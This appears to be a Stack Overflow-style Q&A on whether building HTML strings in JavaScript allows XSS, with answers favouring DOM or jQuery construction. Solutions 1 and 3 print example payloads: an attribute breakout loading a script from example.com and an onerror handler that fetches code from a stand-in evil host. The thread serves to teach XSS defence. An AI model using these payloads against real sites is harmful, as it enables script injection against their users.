Is it really insecure to build HTML strings in JavaScript?

The company that hosts our site reviews our code before deploying it. They recently told us this:

HTML strings should never be directly manipulated, as that opens us up
to potential XSS holes. Instead, always use a DOM api to create
elements…that can be jQuery or the direct DOM apis.

For example, instead of
this.html.push( '<a class="quiz-au" data-src="' + this.au + '"><span class="quiz-au-icon"></span>Click to play</a>' );

They tell us to do
var quizAuLink = $( 'a' );
quizAuLink.addClass( 'quiz-au' );
quizAuLink.data( 'src', this.au );
quizAuLink.text( 'Click to play' );
quizAuLink.prepend( '<span class="quiz-au-icon"></span>' );

Is this really true? Can anyone give us an example of an XSS attack that could exploit an HTML string like the first one?

Solutions/Answers:

Solution 1:

If this.au is somehow modified, it might contain something like this:

"><script src="http://example.com/evilScript.js"></script><span class="

That’ll mess up your HTML and inject a script:

<a class="quiz-au" data-src=""><script src="http://example.com/evilScript.js"></script><span class=""><span class="quiz-au-icon"></span>Click to play</a>

If you use DOM manipulation to set the data-src attribute, the script (or whatever other XSS payload is used) won’t be executed, because the DOM API treats the value as plain data and never parses it as markup.
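As a minimal sketch of the difference, assuming the link is built by concatenating this.au into the markup as in the question: the first function below reproduces the injected markup shown above, and the second builds the same link with plain DOM calls. The function names buildLinkHtml and buildLinkElement are made up for this illustration, and the DOM part only runs where a document object exists.

```javascript
// Payload from the answer above; in practice it would arrive via this.au.
var payload = '"><script src="http://example.com/evilScript.js"></script><span class="';

// Unsafe (hypothetical helper): the value is spliced into markup, so the
// quote at the start of the payload closes the data-src attribute early.
function buildLinkHtml(au) {
  return '<a class="quiz-au" data-src="' + au + '">' +
    '<span class="quiz-au-icon"></span>Click to play</a>';
}

// Safer (hypothetical helper): the value is handed to the DOM as data
// and is never parsed as markup.
function buildLinkElement(doc, au) {
  var link = doc.createElement('a');
  link.className = 'quiz-au';
  link.setAttribute('data-src', au);

  var icon = doc.createElement('span');
  icon.className = 'quiz-au-icon';
  link.appendChild(icon);
  link.appendChild(doc.createTextNode('Click to play'));
  return link;
}

var injectedHtml = buildLinkHtml(payload);
console.log(injectedHtml); // contains a live <script> element once parsed

// Only runs where a DOM exists (for example in a browser).
if (typeof document !== 'undefined') {
  var safeLink = buildLinkElement(document, payload);
  console.log(safeLink.getAttribute('data-src') === payload);
}
```

In the DOM version the payload ends up as the literal value of data-src, so there is nothing for the HTML parser to interpret.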

In response to the commenters who say that anyone able to modify this.au could surely run the script on their own: I don’t know where this.au comes from, nor is it particularly relevant. It could be a value from the database, and the DB might have been compromised. It could also be a malicious user trying to mess things up for other users. It could even be an innocent non-techie who didn’t realize that writing "def" > "abc" would destroy things.


One more thing. In the code you provided, var quizAuLink = $( 'a' ); will not create a new <a> element. It’ll just select all the existing ones. You need to use var quizAuLink = $( '<a>' ); to create a new one.

Solution 2:

This should be just as secure, without compromising too much on readability:

var link = $('<a class="quiz-au"><span class="quiz-au-icon"></span>Click to play</a>');
link.data("src", this.au);

The point is to avoid doing string operations to build HTML strings. Note that in the code above, I used $() only to parse a constant string, which parses to a well-known result. In this example, only the this.au part is dangerous, because it may contain dynamically calculated values.

Solution 3:

Modern browsers do not execute script tags inserted through .innerHTML, so an attacker would use an event handler attribute instead:

If this.au is somehow modified, it might contain something like this:

"><img src="broken-path.png" onerror="alert('my injection');"><span class="

That’ll mess up your HTML and inject a script:

<a class="quiz-au" data-src=""><img src="broken-path.png" onerror="alert('my injection');"><span class=""><span class="quiz-au-icon"></span>Click to play</a>

And of course, to run bigger chunks of JavaScript, set onerror to:

var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = '//www.my-evil-path.com'; d.body.appendChild(s);

Thanks to Scimoster for the boilerplate

Solution 4:

Security aside, when you build HTML in JavaScript you must make sure that it is valid. While it is possible to build and sanitize HTML by string manipulation*, DOM manipulation is far more convenient. Still, you must know exactly which part of your string is HTML and which is literal text.

Consider the following example where we have two hard-coded variables:

var href = "/detail?tag=hr&copy%5B%5D=1",
    text = "The HTML <hr> tag";

The following code naively builds the HTML string:

var div = document.createElement("div");
div.innerHTML = '<a href="' + href + '">' + text + '</a>';
console.log(div.innerHTML);
// <a href="/detail?tag=hr©%5B%5D=1">The HTML <hr> tag</a>

This uses jQuery but it is still incorrect (it uses .html() on a variable that was supposed to be text):

var div = document.createElement("div");
$("<a></a>").attr("href", href).html(text).appendTo(div);
console.log(div.innerHTML);
// <a href="/detail?tag=hr&amp;copy%5B%5D=1">The HTML <hr> tag</a>

This is correct because it displays the text as intended:

var div = document.createElement("div");
$("<a></a>").attr("href", href).text(text).appendTo(div);
console.log(div.innerHTML);
// <a href="/detail?tag=hr&amp;copy%5B%5D=1">The HTML &lt;hr&gt; tag</a>

Conclusion: Using DOM manipulation/jQuery does not guarantee any security, but it sure is one step in the right direction.
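For comparison, the string-manipulation route mentioned at the start of this answer could look roughly like the sketch below. It reuses the same two hard-coded variables; escapeHtml is a hypothetical helper written for this illustration (it is not part of jQuery or the DOM) and only covers text content and double-quoted attribute values.

```javascript
// Hypothetical helper: escapes the characters that are significant in
// HTML text and inside double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

var href = "/detail?tag=hr&copy%5B%5D=1",
    text = "The HTML <hr> tag";

// Every dynamic value is escaped before it is spliced into the markup.
var html = '<a href="' + escapeHtml(href) + '">' + escapeHtml(text) + '</a>';
console.log(html);
// <a href="/detail?tag=hr&amp;copy%5B%5D=1">The HTML &lt;hr&gt; tag</a>
```

This produces the same markup as the .text() version, but it only stays correct as long as every value is escaped at every call site, which is the convenience argument for the DOM approach.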

* See this question for examples. Both string and DOM manipulation are discussed.
